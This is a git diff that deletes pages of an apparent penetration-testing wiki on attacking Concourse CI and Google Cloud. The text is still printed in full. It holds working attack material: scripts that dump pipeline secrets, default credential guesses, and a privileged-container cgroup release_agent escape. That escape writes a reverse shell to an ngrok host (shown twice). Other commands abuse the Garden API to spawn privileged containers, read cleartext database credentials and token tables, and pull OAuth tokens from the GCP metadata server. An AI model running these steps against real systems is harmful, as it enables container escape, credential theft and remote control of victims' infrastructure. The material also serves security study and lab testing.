onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do - echo $pipename; - fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt; - echo ""; -done -echo "" -echo "ALL SECRETS" -cat /tmp/secrets.txt | sort | uniq -rm /tmp/secrets.txt -``` - -### Containers & Workers - -* List **workers**: - * `fly -t workers` -* List **containers**: - * `fly -t containers` -* List **builds** (to see what is running): - * `fly -t builds` - -## Concourse Attacks - -### Credentials Brute-Force - -* admin:admin -* test:test - -### Secrets and params enumeration - -In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them. - -### Session inside running or recently run container - -If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `/` **container** using: - -```bash -fly -t tutorial intercept --job pipeline-name/job-name -fly -t tutorial intercept # To be presented a prompt with all the options -``` - -With these permissions you might be able to: - -* **Steal the secrets** inside the **container** -* Try to **escape** to the node -* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible) - -### Pipeline Creation/Modification - -If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example: - -```yaml -jobs: -- name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - echo "$SUPER_SECRET" - sleep 1000 - params: - SUPER_SECRET: ((super.secret)) -``` - -With the **modification/creation** of a new pipeline you will be able to: - -* **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`) -* **Escape** to the **node** (by giving you enough privileges - `privileged: true`) -* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node) -* **Delete** created pipeline - -### Execute Custom Task - -This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**): - -```yaml -# For more task_config options check https://concourse-ci.org/tasks.html -platform: linux -image_resource: - type: registry-image - source: - repository: ubuntu -run: - path: sh - args: - - -cx - - | - env - sleep 1000 -params: - SUPER_SECRET: ((super.secret)) -``` - -```bash -fly -t tutorial execute --privileged --config task_config.yml -``` - -### Escaping to the node from privileged task - -In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex". - -In the following PoC we are going to use the release\_agent to escape with some small modifications: - -```bash -# Mounts the RDMA cgroup controller and create a child cgroup -# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist" -# It's because your setup doesn't have the memory cgroup controller, try change memory to rdma to fix it -mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x - -# Enables cgroup notifications on release of the "x" cgroup -echo 1 > /tmp/cgrp/x/notify_on_release - - -# CHANGE ME -# The host path will look like the following, but you need to change it: -host_path="/mnt/vda1/hostpath-provisioner/default/concourse-work-dir-concourse-release-worker-0/overlays/ae7df0ca-0b38-4c45-73e2-a9388dcb2028/rootfs" - -# The initial path "/mnt/vda1" is probably the same, but you can check it using the mount command: -#/dev/vda1 on /scratch type ext4 (rw,relatime) -#/dev/vda1 on /tmp/build/e55deab7 type ext4 (rw,relatime) -#/dev/vda1 on /etc/hosts type ext4 (rw,relatime) -#/dev/vda1 on /etc/resolv.conf type ext4 (rw,relatime) - -# Then next part I think is constant "hostpath-provisioner/default/" - -# For the next part "concourse-work-dir-concourse-release-worker-0" you need to know how it's constructed -# "concourse-work-dir" is constant -# "concourse-release" is the consourse prefix of the current concourse env (you need to find it from the API) -# "worker-0" is the name of the worker the container is running in (will be usually that one or incrementing the number) - -# The final part "overlays/bbedb419-c4b2-40c9-67db-41977298d4b3/rootfs" is kind of constant -# running `mount | grep "on / " | grep -Eo "workdir=([^,]+)"` you will see something like: -# workdir=/concourse-work-dir/overlays/work/ae7df0ca-0b38-4c45-73e2-a9388dcb2028 -# the UID is the part we are looking for - -# Then the host_path is: -#host_path="/mnt//hostpath-provisioner/default/concourse-work-dir--worker-/overlays//rootfs" - -# Sets release_agent to /path/payload -echo "$host_path/cmd" > /tmp/cgrp/release_agent - - -#==================================== -#Reverse shell -echo '#!/bin/bash' > /cmd -echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd -chmod a+x /cmd -#==================================== -# Get output -echo '#!/bin/sh' > /cmd -echo "ps aux > $host_path/output" >> /cmd -chmod a+x /cmd -#==================================== - -# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup -sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" - -# Reads the output -cat /output -``` - -{% hint style="warning" %} -As you might have noticed this is just a [**regular release\_agent escape**](../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#privileged) just modifying the path of the cmd in the node -{% endhint %} - -### Escaping to the node from a Worker container - -A regular release\_agent escape with a minor modification is enough for this: - -```bash -mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x - -# Enables cgroup notifications on release of the "x" cgroup -echo 1 > /tmp/cgrp/x/notify_on_release -host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab | head -n 1` -echo "$host_path/cmd" > /tmp/cgrp/release_agent - -#==================================== -#Reverse shell -echo '#!/bin/bash' > /cmd -echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd -chmod a+x /cmd -#==================================== -# Get output -echo '#!/bin/sh' > /cmd -echo "ps aux > $host_path/output" >> /cmd -chmod a+x /cmd -#==================================== - -# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup -sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" - -# Reads the output -cat /output -``` - -### Escaping to the node from the Web container - -Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless). - -However, it stores **local credentials in clear text**: - -```bash -cat /concourse-auth/local-users -test:test - -env | grep -i local_user -CONCOURSE_MAIN_TEAM_LOCAL_USER=test -CONCOURSE_ADD_LOCAL_USER=test:test -``` - -You cloud use that credentials to **login against the web server** and **create a privileged container and escape to the node**. - -In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info): - -```bash -env | grep -i postg -CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238 -CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_PORT=5432 -CONCOURSE_RELEASE_POSTGRESQL_SERVICE_PORT_TCP_POSTGRESQL=5432 -CONCOURSE_POSTGRES_USER=concourse -CONCOURSE_POSTGRES_DATABASE=concourse -CONCOURSE_POSTGRES_PASSWORD=concourse -[...] - -# Access the postgresql db -psql -h 10.107.191.238 -U concourse -d concourse -select * from password; #Find hashed passwords -select * from access_tokens; -select * from auth_code; -select * from client; -select * from refresh_token; -select * from teams; #Change the permissions of the users in the teams -select * from users; -``` - -### Abusing Garden Service - Not a real Attack - -{% hint style="warning" %} -This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before -{% endhint %} - -By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections: - -* It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker. -* The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service. - -Concourse workers run with high container privileges: - -``` -Container Runtime: docker -Has Namespaces: - pid: true - user: false -AppArmor Profile: kernel -Capabilities: - BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read -Seccomp: disabled -``` - -However, techniques like **mounting** the /dev device of the node or release\_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated. - -{% hint style="info" %} -In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**. -{% endhint %} - -Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it. - -#### Getting inside a running privileged container - -```bash -# Get current container -curl 127.0.0.1:7777/containers -{"Handles":["ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]} - -# Get container info -curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/info -curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties - -# Execute a new process inside a container -# In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53 -wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ - --header='Content-Type:application/json' \ - 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' - -# OR instead of doing all of that, you could just get into the ns of the process of the privileged container -nsenter --target 76011 --mount --uts --ipc --net --pid -- sh -``` - -#### Creating a new privileged container - -You can very easily create a new container (just run a random UID) and execute something on it: - -```bash -curl -X POST http://127.0.0.1:7777/containers \ - -H 'Content-Type: application/json' \ - -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}' - -# Wget will be stucked there as long as the process is being executed -wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ - --header='Content-Type:application/json' \ - 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' -``` - -However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers: - -``` -GET /containers HTTP/1.1. -Host: 127.0.0.1:7777. -User-Agent: Go-http-client/1.1. -Accept-Encoding: gzip. -. - -T 127.0.0.1:7777 -> 127.0.0.1:59722 [AP] #157 -HTTP/1.1 200 OK. -Content-Type: application/json. -Date: Thu, 17 Mar 2022 22:42:55 GMT. -Content-Length: 131. -. -{"Handles":["123ae8fc-47ed-4eab-6b2e-123458880690","ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]} - -T 127.0.0.1:59722 -> 127.0.0.1:7777 [AP] #159 -DELETE /containers/123ae8fc-47ed-4eab-6b2e-123458880690 HTTP/1.1. -Host: 127.0.0.1:7777. -User-Agent: Go-http-client/1.1. -Accept-Encoding: gzip. -``` - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/concourse/concourse-lab-creation.md b/cloud-security/concourse/concourse-lab-creation.md deleted file mode 100644 index 457d4850a..000000000 --- a/cloud-security/concourse/concourse-lab-creation.md +++ /dev/null @@ -1,183 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Testing Environment - -## Running Concourse - -### With Docker-Compose - -This docker-compose file simplifies the installation to do some tests with concourse: - -```bash -wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml -docker-compose up -d -``` - -You can download the command line `fly` for your OS from the web in `127.0.0.1:8080` - -### With Kubernetes (Recommended) - -You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart). - -```bash -brew install helm -helm repo add concourse https://concourse-charts.storage.googleapis.com/ -helm install concourse-release concourse/concourse -# concourse-release will be the prefix name for the concourse elements in k8s -# After the installation you will find the indications to connect to it in the console - -# If you need to delete it -helm delete concourse-release -``` - -After generating the concourse env, you could generate a secret and give a access to the SA running in concourse web to access K8s secrets: - -```yaml -echo 'apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRole -metadata: - name: read-secrets -rules: -- apiGroups: [""] - resources: ["secrets"] - verbs: ["get"] - ---- - -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: read-secrets-concourse -roleRef: - apiGroup: rbac.authorization.k8s.io - kind: ClusterRole - name: read-secrets -subjects: -- kind: ServiceAccount - name: concourse-release-web - namespace: default - ---- - -apiVersion: v1 -kind: Secret -metadata: - name: super - namespace: concourse-release-main -type: Opaque -data: - secret: MWYyZDFlMmU2N2Rm - -' | kubectl apply -f - -``` - -## Create Pipeline - -A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html). - -## Steps - -Several different type of steps can be used: - -* **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html) -* the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html) -* the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html) -* the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html) -* the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars) -* the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel -* the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence -* the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values -* the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails - -Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step. - -Therefore, it's possible to indicate the type of container each step needs to be run in. - -## Simple Pipeline Example - -```yaml -jobs: -- name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - sleep 1000 - echo "$SUPER_SECRET" - params: - SUPER_SECRET: ((super.secret)) -``` - -```bash -fly -t tutorial set-pipeline -p pipe-name -c hello-world.yml -# pipelines are paused when first created -fly -t tutorial unpause-pipeline -p pipe-name -# trigger the job and watch it run to completion -fly -t tutorial trigger-job --job pipe-name/simple --watch -# From another console -fly -t tutorial intercept --job pipe-name/simple -``` - -Check **127.0.0.1:8080** to see the pipeline flow. - -## Bash script with output/input pipeline - -It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**. - -## Triggers - -You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time: - -* Some time passes: [Time resource](https://github.com/concourse/time-resource/) -* On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource) -* New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource) -* Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/) - -Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/README.md b/cloud-security/gcp-security/README.md deleted file mode 100644 index c93ac8df7..000000000 --- a/cloud-security/gcp-security/README.md +++ /dev/null @@ -1,540 +0,0 @@ -# GCP Security - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Security concepts - -### **Resource hierarchy** - -Google Cloud uses a [Resource hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specific attachment points for policies and permissions. - -At a high level, it looks like this: - -``` -Organization ---> Folders - --> Projects - --> Resources -``` - -A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc. - -### **IAM Roles** - -There are **three types** of roles in IAM: - -* **Basic/Primitive roles**, which include the **Owner**, **Editor**, and **Viewer** roles that existed prior to the introduction of IAM. -* **Predefined roles**, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles, you can **see all of them with the privileges they have** [**here**](https://cloud.google.com/iam/docs/understanding-roles#predefined\_roles). -* **Custom roles**, which provide granular access according to a user-specified list of permissions. - -There are thousands of permissions in GCP. In order to check if a role has a permissions you can [**search the permission here**](https://cloud.google.com/iam/docs/permissions-reference) and see which roles have it. - -**You can also** [**search here predefined roles**](https://cloud.google.com/iam/docs/understanding-roles#product\_specific\_documentation) **offered by each product.** - -**You can find a** [**list of all the granular permissions here**](https://cloud.google.com/iam/docs/custom-roles-permissions-support)**.** - -#### Basic roles - -| Name | Title | Permissions | -| ---------------- | ------ | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| **roles/viewer** | Viewer | Permissions for **read-only actions** that do not affect state, such as viewing (but not modifying) existing resources or data. | -| **roles/editor** | Editor | All **viewer permissions**, **plus** permissions for actions that modify state, such as changing existing resources. | -| **roles/owner** | Owner |

All Editor permissions and permissions for the following actions:

  • Manage roles and permissions for a project and all resources within the project.
  • Set up billing for a project.
| - -You can try the following command to specifically **enumerate roles assigned to your service account** project-wide in the current project: - -```bash -PROJECT=$(curl http://metadata.google.internal/computeMetadata/v1/project/project-id \ - -H "Metadata-Flavor: Google" -s) -ACCOUNT=$(curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email \ - -H "Metadata-Flavor: Google" -s) -gcloud projects get-iam-policy $PROJECT \ - --flatten="bindings[].members" \ - --format='table(bindings.role)' \ - --filter="bindings.members:$ACCOUNT" -``` - -Don't worry too much if you get denied access to the command above. It's still possible to work out what you can do simply by trying to do it. - -More generally, you can shorten the command to the following to get an idea of the **roles assigned project-wide to all members**. - -``` -gcloud projects get-iam-policy [PROJECT-ID] -``` - -Or to see the IAM policy [assigned to a single Compute Instance](https://cloud.google.com/sdk/gcloud/reference/compute/instances/get-iam-policy) you can try the following. - -``` -gcloud compute instances get-iam-policy [INSTANCE] --zone [ZONE] -``` - -### **Organization Policies** - -The IAM policies indicates the permissions principals has over resources via roles which ara assigned granular permissions. Organization policies **restrict how those service can be used or which features are enabled disabled**. This helps in order to improve the least privilege of each resource in the gcp environment. - -### **Terraform IAM Policies, Bindings and Memberships** - -As defined by terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam) using terraform with GCP there are different ways to grant a principal access over a resource: - -* **Memberships**: You set **principals as members of roles** **without restrictions** over the role or the principals. You can put a user as a member of a role and then put a group as a member of the same role and also set those principals (user and group) as member of other roles. -* **Bindings**: Several **principals can be binded to a role**. Those **principals can still be binded or be members of other roles**. However, if a principal which isn’t binded to the role is set as **member of a binded role**, the next time the **binding is applied, the membership will disappear**. -* **Policies**: A policy is **authoritative**, it indicates roles and principals and then, **those principals cannot have more roles and those roles cannot have more principals** unless that policy is modified (not even in other policies, bindings or memberships). Therefore, when a role or principal is specified in policy all its privileges are **limited by that policy**. Obviously, this can be bypassed in case the principal is given the option to modify the policy or privilege escalation permissions (like create a new principal and bind him a new role). - -### **Service accounts** - -Virtual machine instances are usually **assigned a service account**. Every GCP project has a [default service account](https://cloud.google.com/compute/docs/access/service-accounts#default\_service\_account), and this will be assigned to new Compute Instances unless otherwise specified. Administrators can choose to use either a custom account or no account at all. This service account **can be used by any user or application on the machine** to communicate with the Google APIs. You can run the following command to see what accounts are available to you: - -``` -gcloud auth list -``` - -**Default service accounts will look like** one of the following: - -``` -PROJECT_NUMBER-compute@developer.gserviceaccount.com -PROJECT_ID@appspot.gserviceaccount.com -``` - -A **custom service account** will look like this: - -``` -SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com -``` - -If `gcloud auth list` returns **multiple** accounts **available**, something interesting is going on. You should generally see only the service account. If there is more than one, you can cycle through each using `gcloud config set account [ACCOUNT]` while trying the various tasks in this blog. - -### **Access scopes** - -The **service account** on a GCP Compute Instance will **use** **OAuth** to communicate with the Google Cloud APIs. When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the instance will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. This defines **what API endpoints it can authenticate to**. It does **NOT define the actual permissions**. - -When using a **custom service account**, Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#service\_account\_permissions) that access scopes are not used and to **rely totally on IAM**. The web management portal actually enforces this, but access scopes can still be applied to instances using custom service accounts programatically. - -There are three options when setting an access scope on a VM instance: - -* Allow default access -* All full access to all cloud APIs -* Set access for each API - -You can see what **scopes** are **assigned** by **querying** the **metadata** URL. Here is an example from a VM with "default" access assigned: - -``` -$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes \ - -H 'Metadata-Flavor:Google' - -https://www.googleapis.com/auth/devstorage.read_only -https://www.googleapis.com/auth/logging.write -https://www.googleapis.com/auth/monitoring.write -https://www.googleapis.com/auth/servicecontrol -https://www.googleapis.com/auth/service.management.readonly -https://www.googleapis.com/auth/trace.append -``` - -The most interesting thing in the **default** **scope** is **`devstorage.read_only`**. This grants read access to all storage buckets in the project. This can be devastating, which of course is great for us as an attacker. - -Here is what you'll see from an instance with **no scope limitations**: - -``` -curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google' -https://www.googleapis.com/auth/cloud-platform -``` - -This `cloud-platform` scope is what we are really hoping for, as it will allow us to authenticate to any API function and leverage the full power of our assigned IAM permissions. - -It is possible to encounter some **conflicts** when using both **IAM and access scopes**. For example, your service account may have the IAM role of `compute.instanceAdmin` but the instance you've breached has been crippled with the scope limitation of `https://www.googleapis.com/auth/compute.readonly`. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance. - -### Default credentials - -**Default service account token** - -The **metadata server** available to a given instance will **provide** any user/process **on that instance** with an **OAuth token** that is automatically used as the **default credentials** when communicating with Google APIs via the `gcloud` command. - -You can retrieve and inspect the token with the following curl command: - -```bash -curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \ - -H "Metadata-Flavor: Google" -``` - -Which will receive a response like the following: - -```json -{ - "access_token":"ya29.AHES6ZRN3-HlhAPya30GnW_bHSb_QtAS08i85nHq39HE3C2LTrCARA", - "expires_in":3599, - "token_type":"Bearer" - } -``` - -This token is the **combination of the service account and access scopes** assigned to the Compute Instance. So, even though your service account may have **every IAM privilege** imaginable, this particular OAuth token **might be limited** in the APIs it can communicate with due to **access scopes**. - -**Application default credentials** - -When using one of Google's official GCP client libraries, the code will automatically go **searching for credentials** following a strategy called [Application Default Credentials](https://cloud.google.com/docs/authentication/production). - -1. First, it will check would be the [**source code itself**](https://cloud.google.com/docs/authentication/production#passing\_the\_path\_to\_the\_service\_account\_key\_in\_code). Developers can choose to statically point to a service account key file. -2. The next is an **environment variable called `GOOGLE_APPLICATION_CREDENTIALS`**. This can be set to point to a **service account key file**. -3. Finally, if neither of these are provided, the application will revert to using the **default token provided by the metadata server** as described in the section above. - -Finding the actual **JSON file with the service account credentials** is generally much **more** **desirable** than **relying on the OAuth token** on the metadata server. This is because the raw service account credentials can be activated **without the burden of access scopes** and without the short expiration period usually applied to the tokens. - -### **Networking** - -Compute Instances are connected to networks called VPCs or [Virtual Private Clouds](https://cloud.google.com/vpc/docs/vpc). [GCP firewall](https://cloud.google.com/vpc/docs/firewalls) rules are defined at this network level but are applied individually to a Compute Instance. Every network, by default, has two [implied firewall rules](https://cloud.google.com/vpc/docs/firewalls#default\_firewall\_rules): allow outbound and deny inbound. - -Each GCP project is provided with a VPC called `default`, which applies the following rules to all instances: - -* default-allow-internal (allow all traffic from other instances on the `default` network) -* default-allow-ssh (allow 22 from everywhere) -* default-allow-rdp (allow 3389 from everywhere) -* default-allow-icmp (allow ping from everywhere) - -**Meet the neighbors** - -Firewall rules may be more permissive for internal IP addresses. This is especially true for the default VPC, which permits all traffic between Compute Instances. - -You can get a nice readable view of all the subnets in the current project with the following command: - -``` -gcloud compute networks subnets list -``` - -And an overview of all the internal/external IP addresses of the Compute Instances using the following: - -``` -gcloud compute instances list -``` - -If you go crazy with nmap from a Compute Instance, Google will notice and will likely send an alert email to the project owner. This is more likely to happen if you are scanning public IP addresses outside of your current project. Tread carefully. - -**Enumerating public ports** - -Perhaps you've been unable to leverage your current access to move through the project internally, but you DO have read access to the compute API. It's worth enumerating all the instances with firewall ports open to the world - you might find an insecure application to breach and hope you land in a more powerful position. - -In the section above, you've gathered a list of all the public IP addresses. You could run nmap against them all, but this may taken ages and could get your source IP blocked. - -When attacking from the internet, the default rules don't provide any quick wins on properly configured machines. It's worth checking for password authentication on SSH and weak passwords on RDP, of course, but that's a given. - -What we are really interested in is other firewall rules that have been 